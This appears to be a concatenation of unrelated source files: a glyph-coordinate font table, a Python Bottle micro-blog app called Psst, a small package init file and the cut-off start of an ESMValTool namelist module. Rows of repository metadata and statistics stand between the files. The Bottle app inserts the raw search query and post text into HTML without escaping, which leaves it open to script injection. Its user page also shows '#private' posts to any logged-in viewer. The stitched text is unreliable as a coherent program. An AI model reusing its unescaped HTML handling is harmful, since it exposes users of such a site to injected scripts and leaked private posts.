[18,30, # Ascii 109
4,14, 4, 0,-1,-1, 4,10, 7,13, 9,14,12,14,14,13,15,10,15, 0,-1,-1,15,
10,18,13,20,14,23,14,25,13,26,10,26, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[10,19, # Ascii 110
4,14, 4, 0,-1,-1, 4,10, 7,13, 9,14,12,14,14,13,15,10,15, 0,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[17,19, # Ascii 111
8,14, 6,13, 4,11, 3, 8, 3, 6, 4, 3, 6, 1, 8, 0,11, 0,13, 1,15, 3,16,
6,16, 8,15,11,13,13,11,14, 8,14,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[17,19, # Ascii 112
4,14, 4,-7,-1,-1, 4,11, 6,13, 8,14,11,14,13,13,15,11,16, 8,16, 6,15,
3,13, 1,11, 0, 8, 0, 6, 1, 4, 3,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[17,19, # Ascii 113
15,14,15,-7,-1,-1,15,11,13,13,11,14, 8,14, 6,13, 4,11, 3, 8, 3, 6, 4,
3, 6, 1, 8, 0,11, 0,13, 1,15, 3,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[8,13, # Ascii 114
4,14, 4, 0,-1,-1, 4, 8, 5,11, 7,13, 9,14,12,14,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[17,17, # Ascii 115
14,11,13,13,10,14, 7,14, 4,13, 3,11, 4, 9, 6, 8,11, 7,13, 6,14, 4,14,
3,13, 1,10, 0, 7, 0, 4, 1, 3, 3,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[8,12, # Ascii 116
5,21, 5, 4, 6, 1, 8, 0,10, 0,-1,-1, 2,14, 9,14,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[10,19, # Ascii 117
4,14, 4, 4, 5, 1, 7, 0,10, 0,12, 1,15, 4,-1,-1,15,14,15, 0,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[5,16, # Ascii 118
2,14, 8, 0,-1,-1,14,14, 8, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[11,22, # Ascii 119
3,14, 7, 0,-1,-1,11,14, 7, 0,-1,-1,11,14,15, 0,-1,-1,19,14,15, 0,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[5,17, # Ascii 120
3,14,14, 0,-1,-1,14,14, 3, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[9,16, # Ascii 121
2,14, 8, 0,-1,-1,14,14, 8, 0, 6,-4, 4,-6, 2,-7, 1,-7,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[8,17, # Ascii 122
14,14, 3, 0,-1,-1, 3,14,14,14,-1,-1, 3, 0,14, 0,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[39,14, # Ascii 123
9,25, 7,24, 6,23, 5,21, 5,19, 6,17, 7,16, 8,14, 8,12, 6,10,-1,-1, 7,
24, 6,22, 6,20, 7,18, 8,17, 9,15, 9,13, 8,11, 4, 9, 8, 7, 9, 5, 9, 3,
8, 1, 7, 0, 6,-2, 6,-4, 7,-6,-1,-1, 6, 8, 8, 6, 8, 4, 7, 2, 6, 1, 5,
-1, 5,-3, 6,-5, 7,-6, 9,-7,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[2, 8, # Ascii 124
4,25, 4,-7,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[39,14, # Ascii 125
5,25, 7,24, 8,23, 9,21, 9,19, 8,17, 7,16, 6,14, 6,12, 8,10,-1,-1, 7,
24, 8,22, 8,20, 7,18, 6,17, 5,15, 5,13, 6,11,10, 9, 6, 7, 5, 5, 5, 3,
6, 1, 7, 0, 8,-2, 8,-4, 7,-6,-1,-1, 8, 8, 6, 6, 6, 4, 7, 2, 8, 1, 9,
-1, 9,-3, 8,-5, 7,-6, 5,-7,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[23,24, # Ascii 126
3, 6, 3, 8, 4,11, 6,12, 8,12,10,11,14, 8,16, 7,18, 7,20, 8,21,10,-1,
-1, 3, 8, 4,10, 6,11, 8,11,10,10,14, 7,16, 6,18, 6,20, 7,21,10,21,12,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1]
]
| 65.530225
| 76
| 0.33256
| 10,844
| 37,942
| 1.163593
| 0.012634
| 1.278016
| 1.872325
| 2.466318
| 0.821049
| 0.811143
| 0.801712
| 0.792439
| 0.784831
| 0.781027
| 0
| 0.378392
| 0.159849
| 37,942
| 578
| 77
| 65.643599
| 0.017442
| 0.02575
| 0
| 0.694056
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
a4572f9162dadd3cfbe700bcdc7d618ca3e655fa
| 17,466
|
py
|
Python
|
Psst/main.py
|
jasonkwh/prev-assignments
|
7021ec48b03d882c59ff044f554d73b6884a4919
|
[
"MIT"
] | null | null | null |
Psst/main.py
|
jasonkwh/prev-assignments
|
7021ec48b03d882c59ff044f554d73b6884a4919
|
[
"MIT"
] | null | null | null |
Psst/main.py
|
jasonkwh/prev-assignments
|
7021ec48b03d882c59ff044f554d73b6884a4919
|
[
"MIT"
] | null | null | null |
__author__ = 'Hanxiang Huang'
from bottle import Bottle, template, static_file, request, response, HTTPError
import interface
from database import COMP249Db
from users import check_login, session_user, delete_session, generate_session
application = Bottle()
COOKIE_NAME = 'sessionid'
@application.route('/')
def index():
    """Front page of Psst.

    Anonymous visitors see the latest pssts and a login form; logged-in
    users see a posting form and their own panel instead.  Posts tagged
    '#private' are hidden from everyone except their author and any
    user mentioned with '@name'.
    """
    db = COMP249Db()
    username = session_user(db)  # None when nobody is logged in
    login_string = ""
    private = "#private"  # tag that marks a post as private
    posts = interface.post_list(db, usernick=None, limit=50)

    def append_row(page, item, http):
        """Append one avatar/author/content/timestamp table row."""
        page = page + "<tr>"
        page = page + "<td valign='top'><img src='" + item[4] + "' width='45'></td>"  # user avatar
        page = (page + "<td valign='bottom'><a href='/users/" + item[2] + "'>@"
                + item[2] + ": </a>" + http + " - <i>posted on "
                + item[1] + "</i></br></br></td></tr>")  # username and contents
        return page

    if not username:
        page = "<h2><b>Welcome to Psst.</b> Latest pssts:</h2>"  # title
        # display input field for username and password if the user not logged in
        login_string = "<form id='loginform' method='POST' action ='/login'><input type='text' name='nick' placeholder='username' class='focus' onKeyPress='return submitenter(this,event)'><input type='password' name='password' placeholder='password' class='focus' onKeyPress='return submitenter(this,event)'></form>"
        page = page + "<table>"
        for item in posts:
            content = interface.post_to_html(item[3])
            http = interface.post_to_html(content)  # NOTE(review): converted twice, kept from original
            # hide posts carrying the '#private' tag
            if private.lower() not in http.lower():
                page = append_row(page, item, http)
                users(item[2])     # NOTE(review): return value discarded; looks redundant
                mentions(item[2])  # NOTE(review): return value discarded; looks redundant
    if username:
        # logged-in users get the posting form instead of the title
        page = "<form action='/post' id='postform' method='POST'><input type='postfield' name='post' placeholder='post pssts (you can add #private tag to make the psst privately)' class='focus' onKeyPress='return submitenter(this,event)'></form>"
        for item in posts:
            if username == item[2]:
                # panel: avatar, own-posts link, mentions link and logout
                login_string = "<form action= '/logout' id='logoutform' name='logoutform' method='POST' ><table><tr><td><img src='" + item[4] + "' width='85'></td><td><h3>Logged in as " + username + "</h3><p><a href='/users/" + username + "'>Posted pssts</a></p><p><a href='/mentions/" + username + "'>@me pssts</a></p><p><a href='javascript: document.logoutform.submit();'>Logout</a></p></td></tr></table></form>"
        page = page + "<table>"
        at_user = "@" + username
        for item in posts:
            content = interface.post_to_html(item[3])
            http = interface.post_to_html(content)
            has_private = private.lower() in http.lower()
            # visible when public, when it mentions the viewer, or when it
            # is the viewer's own private post
            if (not has_private
                    or at_user.lower() in http.lower()
                    or (has_private and username.lower() in item[2].lower())):
                page = append_row(page, item, http)
                users(item[2])     # NOTE(review): return value discarded; looks redundant
                mentions(item[2])  # NOTE(review): return value discarded; looks redundant
    page = page + "</table>"
    return template('base.tpl', base=page, validate='', login=login_string)
@application.post('/login')
def login():
    """Handle a login attempt.

    Renders the public post list; on bad credentials the same page is
    shown with a red 'Failed.' marker, on success a session is created
    and the client is redirected to '/'.
    """
    db = COMP249Db()
    posts = interface.post_list(db, usernick=None, limit=50)
    private = "#private"  # tag that marks a post as private
    page = "<h2><b>Welcome to Psst.</b> Latest pssts:</h2>"  # title
    page = page + "<table>"
    # list the latest public posts
    for item in posts:
        content = interface.post_to_html(item[3])
        http = interface.post_to_html(content)  # NOTE(review): converted twice, kept from original
        # hide posts carrying the '#private' tag
        if private.lower() not in http.lower():
            page = page + "<tr>"
            page = page + "<td valign='top'><img src='" + item[4] + "' width='45'></td>"  # user avatar
            page = (page + "<td valign='bottom'><a href='/users/" + item[2] + "'>@"
                    + item[2] + ": </a>" + http + " - <i>posted on "
                    + item[1] + "</i></br></br></td></tr>")  # username and contents
            users(item[2])     # NOTE(review): return value discarded; looks redundant
            mentions(item[2])  # NOTE(review): return value discarded; looks redundant
    page = page + "</table>"
    if 'nick' in request.forms:
        username = request.forms['nick']          # username from the 'nick' field
        password = request.forms['password']      # password from the 'password' field
        failed = "<p style='color:red'>Failed.</p>"
        login_form = "<form id='loginform' method='POST' action ='/login'><input type='text' name='nick' placeholder='username' class='focus' onKeyPress='return submitenter(this,event)'><input type='password' name='password' placeholder='password' class='focus' onKeyPress='return submitenter(this,event)'></form>"
        if not check_login(db, username, password):
            # invalid credentials: re-render the page with the failure marker
            return template('base.tpl', base=page, validate=failed, login=login_form)
        generate_session(db, username)  # create the user session cookie
        response.set_header('Location', '/')
        response.status = 303
        return "Redirect to /"  # redirect to /
    # NOTE(review): a POST without a 'nick' field falls through and returns
    # None (empty 200 response) — kept from original, confirm intended
@application.post('/logout')
def logout():
    """End the current session (if any) and redirect to the front page."""
    db = COMP249Db()
    user = session_user(db)  # owner of the session cookie, if logged in
    if user:
        delete_session(db, user)  # drop the stored session
    response.set_header('Location', '/')
    response.status = 303
    return "Redirect to /"
@application.post('/post')
def add_post():
    """Store a new psst for the logged-in user, then redirect home."""
    db = COMP249Db()
    author = session_user(db)  # only logged-in users may post
    if author:
        content = request.forms['post']  # text from the 'post' input field
        interface.post_add(db, author, content)
    response.set_header('Location', '/')
    response.status = 303
    return "Redirect to /"
@application.post('/search')
def search():
    """Search pssts by author nick and/or content.

    Applies the same '#private' visibility rules as the front page:
    private posts are only shown to their author or to users they
    mention with '@name'.
    """
    db = COMP249Db()
    username = session_user(db)  # None when nobody is logged in
    private = "#private"  # tag that marks a post as private
    login_string = ""
    # Robustness fix: a POST without a 'search' field used to leave the
    # page variables undefined and crash with a NameError; treat a
    # missing field as an empty query (which matches every post).
    query = request.forms.get('search', '')
    page = "<h2>Search results for '" + query + "':</h2>"  # title
    posts = interface.post_list(db, usernick=None, limit=50)

    def append_row(page, item, http):
        """Append one avatar/author/content/timestamp table row."""
        page = page + "<tr>"
        page = page + "<td valign='top'><img src='" + item[4] + "' width='45'></td>"  # user avatar
        page = (page + "<td valign='bottom'><a href='/users/" + item[2] + "'>@"
                + item[2] + ": </a>" + http + " - <i>posted on "
                + item[1] + "</i></br></br></td></tr>")  # username and contents
        return page

    if not username:
        # display input field for username and password if the user not logged in
        login_string = "<form id='loginform' method='POST' action ='/login'><input type='text' name='nick' placeholder='username' class='focus' onKeyPress='return submitenter(this,event)'><input type='password' name='password' placeholder='password' class='focus' onKeyPress='return submitenter(this,event)'></form>"
        page = page + "<table>"
        for item in posts:
            content = interface.post_to_html(item[3])
            http = interface.post_to_html(content)  # NOTE(review): converted twice, kept from original
            # public posts whose author or content matches the query
            if (private.lower() not in http.lower()
                    and (query.lower() in item[2].lower()
                         or query.lower() in http.lower())):
                page = append_row(page, item, http)
                users(item[2])     # NOTE(review): return value discarded; looks redundant
                mentions(item[2])  # NOTE(review): return value discarded; looks redundant
        page = page + "</table>"
    if username:
        at_user = "@" + username
        for item in posts:
            if username == item[2]:
                # panel: avatar, own-posts link, mentions link and logout
                login_string = "<form action= '/logout' id='logoutform' name='logoutform' method='POST' ><table><tr><td><img src='" + item[4] + "' width='85'></td><td><h3>Logged in as " + username + "</h3><p><a href='/users/" + username + "'>Posted pssts</a></p><p><a href='/mentions/" + username + "'>@me pssts</a></p><p><a href='javascript: document.logoutform.submit();'>Logout</a></p></td></tr></table></form>"
        page = page + "<table>"
        for item in posts:
            content = interface.post_to_html(item[3])
            http = interface.post_to_html(content)
            has_private = private.lower() in http.lower()
            matches = (query.lower() in item[2].lower()
                       or query.lower() in http.lower())
            # matching posts that are public, mention the viewer, or are
            # the viewer's own private posts
            if matches and (not has_private
                            or at_user.lower() in http.lower()
                            or (has_private and username.lower() in item[2].lower())):
                page = append_row(page, item, http)
                users(item[2])     # NOTE(review): return value discarded; looks redundant
                mentions(item[2])  # NOTE(review): return value discarded; looks redundant
        page = page + "</table>"
    return template('base.tpl', base=page, validate='', login=login_string)
@application.route('/users/<username:path>')
def users(username):
    """Page listing the pssts posted by *username*.

    Anonymous viewers only see the user's public posts; logged-in
    viewers see all of them.
    """
    db = COMP249Db()
    uname = session_user(db)  # the viewer; None when not logged in
    login_string = ""
    private = "#private"  # tag that marks a post as private
    own_posts = interface.post_list(db, usernick=username, limit=50)
    all_posts = interface.post_list(db, usernick=None, limit=50)
    page = ""
    for item in own_posts:
        # every row carries the same nick, so this just (re)sets the title
        page = "<h2><b>" + item[2] + "</b> posted pssts:</h2>"
    if not uname:
        # display input field for username and password if the user not logged in
        login_string = "<form id='loginform' method='POST' action ='/login'><input type='text' name='nick' placeholder='username' class='focus' onKeyPress='return submitenter(this,event)'><input type='password' name='password' placeholder='password' class='focus' onKeyPress='return submitenter(this,event)'></form>"
        page = page + "<table>"
        for item in all_posts:
            if username == item[2]:
                content = interface.post_to_html(item[3])
                http = interface.post_to_html(content)  # NOTE(review): converted twice, kept from original
                # hide posts carrying the '#private' tag
                if private.lower() not in http.lower():
                    page = page + "<tr>"
                    page = page + "<td valign='top'><img src='" + item[4] + "' width='45'></td>"  # user avatar
                    page = (page + "<td valign='bottom'><a href='/users/" + item[2] + "'>@"
                            + item[2] + ": </a>" + http + " - <i>posted on "
                            + item[1] + "</i></br></br></td></tr>")  # username and contents
        page = page + "</table>"
    if uname:
        for item in all_posts:
            if uname == item[2]:
                # panel: avatar, own-posts link, mentions link and logout
                login_string = "<form action= '/logout' id='logoutform' name='logoutform' method='POST' ><table><tr><td><img src='" + item[4] + "' width='85'></td><td><h3>Logged in as " + uname + "</h3><p><a href='/users/" + uname + "'>Posted pssts</a></p><p><a href='/mentions/" + uname + "'>@me pssts</a></p><p><a href='javascript: document.logoutform.submit();'>Logout</a></p></td></tr></table></form>"
        page = page + "<table>"
        for item in all_posts:
            if username == item[2]:
                content = interface.post_to_html(item[3])
                http = interface.post_to_html(content)
                # NOTE(review): no '#private' filter here — this user's private
                # posts are visible to EVERY logged-in viewer; confirm intended
                page = page + "<tr>"
                page = page + "<td valign='top'><img src='" + item[4] + "' width='45'></td>"  # user avatar
                page = (page + "<td valign='bottom'><a href='/users/" + item[2] + "'>@"
                        + item[2] + ": </a>" + http + " - <i>posted on "
                        + item[1] + "</i></br></br></td></tr>")  # username and contents
        page = page + "</table>"
    return template('base.tpl', base=page, validate='', login=login_string)
@application.route('/mentions/<username:path>')
def mentions(username):
    """Page listing the pssts that mention @*username*.

    Private mentions ('#private') are only shown to the viewer when
    the viewer wrote them or is mentioned in them.
    """
    db = COMP249Db()
    uname = session_user(db)  # the viewer; None when not logged in
    private = "#private"  # tag that marks a post as private
    login_string = ""
    mention_posts = interface.post_list_mentions(db, usernick=username, limit=50)
    all_posts = interface.post_list(db, usernick=None, limit=50)
    page = "<h2>These pssts mentioned <b>" + username + "</b>:</h2>"  # title
    if not uname:
        # display input field for username and password if the user not logged in
        login_string = "<form id='loginform' method='POST' action ='/login'><input type='text' name='nick' placeholder='username' class='focus' onKeyPress='return submitenter(this,event)'><input type='password' name='password' placeholder='password' class='focus' onKeyPress='return submitenter(this,event)'></form>"
        page = page + "<table>"
        for item in mention_posts:
            content = interface.post_to_html(item[3])
            http = interface.post_to_html(content)  # NOTE(review): converted twice, kept from original
            # hide posts carrying the '#private' tag
            if private.lower() not in http.lower():
                page = page + "<tr>"
                page = page + "<td valign='top'><img src='" + item[4] + "' width='45'></td>"  # user avatar
                page = (page + "<td valign='bottom'><a href='/users/" + item[2] + "'>@"
                        + item[2] + ": </a>" + http + " - <i>posted on "
                        + item[1] + "</i></br></br></td></tr>")  # username and contents
        page = page + "</table>"
    if uname:
        at_user = "@" + uname
        for item in all_posts:
            if uname == item[2]:
                # panel: avatar, own-posts link, mentions link and logout
                login_string = "<form action= '/logout' id='logoutform' name='logoutform' method='POST' ><table><tr><td><img src='" + item[4] + "' width='85'></td><td><h3>Logged in as " + uname + "</h3><p><a href='/users/" + uname + "'>Posted pssts</a></p><p><a href='/mentions/" + uname + "'>@me pssts</a></p><p><a href='javascript: document.logoutform.submit();'>Logout</a></p></td></tr></table></form>"
        page = page + "<table>"
        for item in mention_posts:
            content = interface.post_to_html(item[3])
            http = interface.post_to_html(content)
            has_private = private.lower() in http.lower()
            # public mentions, or private ones the viewer wrote or is mentioned in
            if (not has_private
                    or (uname == item[2] and has_private)
                    or (at_user.lower() in http.lower() and has_private)):
                page = page + "<tr>"
                page = page + "<td valign='top'><img src='" + item[4] + "' width='45'></td>"  # user avatar
                page = (page + "<td valign='bottom'><a href='/users/" + item[2] + "'>@"
                        + item[2] + ": </a>" + http + " - <i>posted on "
                        + item[1] + "</i></br></br></td></tr>")  # username and contents
        page = page + "</table>"
    return template('base.tpl', base=page, validate='', login=login_string)
@application.route('/static/<filename:path>')
def static(filename):
    """Serve a file from the local 'static' directory."""
    return static_file(filename, root='static')
if __name__ == '__main__':
    # Development entry point: serve on http://localhost:8080 with debug pages.
    application.run(host='localhost', port=8080, debug=True)
| 61.717314
| 417
| 0.582331
| 2,208
| 17,466
| 4.568388
| 0.091033
| 0.026767
| 0.026767
| 0.033905
| 0.838208
| 0.831665
| 0.816794
| 0.807772
| 0.788242
| 0.777635
| 0
| 0.013197
| 0.245105
| 17,466
| 283
| 418
| 61.717314
| 0.751839
| 0.190313
| 0
| 0.787879
| 0
| 0.060606
| 0.344837
| 0.091415
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034632
| false
| 0.030303
| 0.017316
| 0.004329
| 0.090909
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a4671a928c0178fbe90016c417d1223e45dca1ef
| 346
|
py
|
Python
|
abfahrt/classes/__init__.py
|
Team-Zugig-zum-Erfolg/InformatiCup
|
788076ac38bf6d8f462465b7fb96db14d13bed30
|
[
"MIT"
] | 1
|
2022-01-30T14:30:02.000Z
|
2022-01-30T14:30:02.000Z
|
abfahrt/classes/__init__.py
|
Team-Zugig-zum-Erfolg/InformatiCup
|
788076ac38bf6d8f462465b7fb96db14d13bed30
|
[
"MIT"
] | null | null | null |
abfahrt/classes/__init__.py
|
Team-Zugig-zum-Erfolg/InformatiCup
|
788076ac38bf6d8f462465b7fb96db14d13bed30
|
[
"MIT"
] | null | null | null |
"""
This is the classes package, which includes all entity classes.
"""
from abfahrt.classes.Station import *
from abfahrt.classes.Passenger import *
from abfahrt.classes.Line import *
from abfahrt.classes.Train import *
from abfahrt.classes.TrainInLine import *
from abfahrt.classes.TrainInStation import *
from abfahrt.classes.Travel import *
| 31.454545
| 64
| 0.794798
| 45
| 346
| 6.111111
| 0.422222
| 0.28
| 0.458182
| 0.523636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.124277
| 346
| 10
| 65
| 34.6
| 0.907591
| 0.17341
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.142857
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
8efbdd3281b41b96a883fd15667de1c9b00ed28a
| 9,069
|
py
|
Python
|
util/nml-utils/library_nml.py
|
c3s-magic/ESMValTool
|
799150e4784f334262755a39022c72b2d39585c9
|
[
"Apache-2.0"
] | null | null | null |
util/nml-utils/library_nml.py
|
c3s-magic/ESMValTool
|
799150e4784f334262755a39022c72b2d39585c9
|
[
"Apache-2.0"
] | null | null | null |
util/nml-utils/library_nml.py
|
c3s-magic/ESMValTool
|
799150e4784f334262755a39022c72b2d39585c9
|
[
"Apache-2.0"
] | 2
|
2017-03-24T04:18:09.000Z
|
2020-12-19T06:04:05.000Z
|
import pdb
import re
import xml.sax
class NamelistError(Exception):
    """Raised for errors while processing ESMValTool namelists."""

    def __init__(self, value):
        # populate Exception.args so standard tooling (tracebacks,
        # pickling) sees the payload as well
        super().__init__(value)
        self.value = value

    def __str__(self):
        # keep the original contract: str(err) is repr() of the payload
        return repr(self.value)
class splitDiags(xml.sax.handler.ContentHandler):
    """SAX handler that splits an ESMValTool namelist into sections.

    After parsing, ``namelist_sections`` holds the text before the
    first <diag> ("header"), each serialized <diag> element ("diags",
    a list), and the remainder ("footer").
    """

    def __init__(self):
